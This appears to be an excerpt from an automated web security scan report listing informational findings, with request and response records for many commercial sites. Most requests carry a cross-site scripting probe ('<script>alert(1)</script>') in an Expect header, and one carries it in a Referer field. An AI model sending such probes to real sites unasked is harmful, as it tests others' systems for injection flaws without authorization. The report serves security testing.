Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/v.js

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=15400897811300976568; 480-VT=drive_03-24-2011-14-22-48_15008318461300976568ZZZZadver_03-28-2011-19-48-35_18309878591301341715

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 18:10:29 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 998
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

16.9. http://www.4jobs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4jobs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4jobs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:57:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.10. http://www.800adfrenzy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.800adfrenzy.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.800adfrenzy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:37:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.11. http://www.accessmycardonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.accessmycardonline.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.accessmycardonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Unknown
Date: Fri, 01 Apr 2011 16:35:55 GMT
Content-length: 521
Content-type: text/html
Connection: close

<!-- ***************************************************************************************************************************************************************************************************
...[SNIP]...

16.12. http://www.activediner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.activediner.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.activediner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:02:06 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.13. http://www.aeriagames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aeriagames.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 01 Apr 2011 16:12:00 GMT
Server: Aeria Games & Entertainment

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

16.14. http://www.affairsclub.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.affairsclub.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affairsclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not found
Server: Zeus/4.3
Date: Fri, 01 Apr 2011 16:46:51 GMT
Connection: close
Content-Type: text/html

<html>

<head>
<title>Error 404</title>
<META http-equiv="refresh" content="0;URL=/">
</head>

<BODY>
</BODY>

</HTML>

16.15. http://www.afterellen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.afterellen.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.afterellen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 250
Cache-Control: max-age=1800
Expires: Fri, 01 Apr 2011 17:04:06 GMT
Date: Fri, 01 Apr 2011 16:34:06 GMT
Connection: close

<HTML><HEAD>
<TITLE>Gateway Timeout - In read </TITLE>
</HEAD><BODY>
<H1>Gateway Timeout</H1>
The proxy server did not receive a timely response from the upstream server.<P>
Reference #1.5
...[SNIP]...

16.16. http://www.allthumbshost.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.allthumbshost.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allthumbshost.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 01 Apr 2011 15:54:19 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

16.17. http://www.amazingfreerewards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazingfreerewards.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amazingfreerewards.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:20:29 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Fri, 01 Apr 2011 16:20:29 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

16.18. http://www.amazingrewardsonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazingrewardsonline.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amazingrewardsonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:57:47 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Fri, 01 Apr 2011 15:57:47 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

16.19. http://www.americajob.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.americajob.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americajob.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:35:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.20. http://www.artsonia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.artsonia.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.artsonia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 17:07:08 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.21. http://www.asset-cache.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.asset-cache.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asset-cache.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 207
Expires: Fri, 01 Apr 2011 17:07:30 GMT
Date: Fri, 01 Apr 2011 17:07:30 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "/favicon.ico", is invalid.<p>
Reference #9.34f3f748.1301677650.465160
</BODY><
...[SNIP]...

16.22. http://www.astrocenter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astrocenter.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.astrocenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:53:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.23. http://www.athletic.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.athletic.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.athletic.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:10:18 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.24. http://www.auctionmicro.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.auctionmicro.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.auctionmicro.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:15:41 GMT
Server: LiteSpeed
Connection: close
Content-Type: text/html
Content-Length: 72

<meta http-equiv="refresh" content="0;url=http://www.intershopzone.com">

16.25. http://www.bakati.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bakati.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bakati.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:12:58 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.26. http://www.barelist.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.barelist.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.barelist.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:12:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.27. http://www.betus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.betus.com
Path:	/favicon.ico

Request

Response

16.28. http://www.biblestudytools.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.biblestudytools.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblestudytools.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:05:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.29. http://www.big5sportinggoods.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.big5sportinggoods.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.big5sportinggoods.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:49:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.30. http://www.bittybitznpieces.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bittybitznpieces.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bittybitznpieces.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 16:21:33 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

16.31. http://www.bizbuysell.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizbuysell.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizbuysell.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:10:03 GMT
Connection: close
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.32. http://www.blockbusterexpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blockbusterexpress.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blockbusterexpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:40:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.33. http://www.bradsdeals.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bradsdeals.com
Path:	/favicon.ico

Request

Response

16.34. http://www.bravoatk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bravoatk.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bravoatk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 01 Apr 2011 16:13:07 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

16.35. http://www.brownells.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brownells.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brownells.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:12:48 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.36. http://www.buildacareer.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buildacareer.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buildacareer.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:56:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.37. http://www.cambridge.org/date/writeYear_js.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/date/writeYear_js.asp

Request

GET /date/writeYear_js.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAABDSSSR=KCLAEEPCNJAMKMPJHPPHKMKP; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.1.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40
Content-Type: text/html
Cache-Control: private
Date: Fri, 01 Apr 2011 18:12:55 GMT
Connection: close
Vary: Accept-Encoding

16.38. http://www.cambridge.org/uk/date/writeYear_js.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/date/writeYear_js.asp

Request

Response

16.39. http://www.careerplanner.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.careerplanner.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.careerplanner.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Fri, 01 Apr 2011 16:54:34 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

16.40. http://www.caring4cancer.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.caring4cancer.com
Path:	/favicon.ico

Request

Response

16.41. http://www.carsforsale.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.carsforsale.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.carsforsale.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:21:42 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.42. http://www.cdn-businessweek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdn-businessweek.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cdn-businessweek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 16:41:32 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

16.43. http://www.cdn-thestreet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cdn-thestreet.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cdn-thestreet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Fri, 01 Apr 2011 15:44:27 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

16.44. http://www.centerpointenergy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.centerpointenergy.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.centerpointenergy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 6359
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Fri, 01 Apr 2011 15:35:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:35:48 GMT
Connection: close

<link rel="stylesheet" type="text/css" href="/portal/css/portal011899767617241174594023762.css">
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd
...[SNIP]...

16.45. http://www.cheaperthandirt.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheaperthandirt.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cheaperthandirt.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:36:44 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.46. http://www.cheapostay.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cheapostay.com
Path:	/favicon.ico

Request

Response

16.47. http://www.clipartcastle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clipartcastle.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.clipartcastle.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:47:01 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

16.48. http://www.codeplex.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.codeplex.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.codeplex.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:49:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.49. http://www.covers.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covers.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.covers.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:03:01 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.50. http://www.custom404error.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.custom404error.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.custom404error.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:41:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

16.51. http://www.dailytech.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailytech.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailytech.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE7
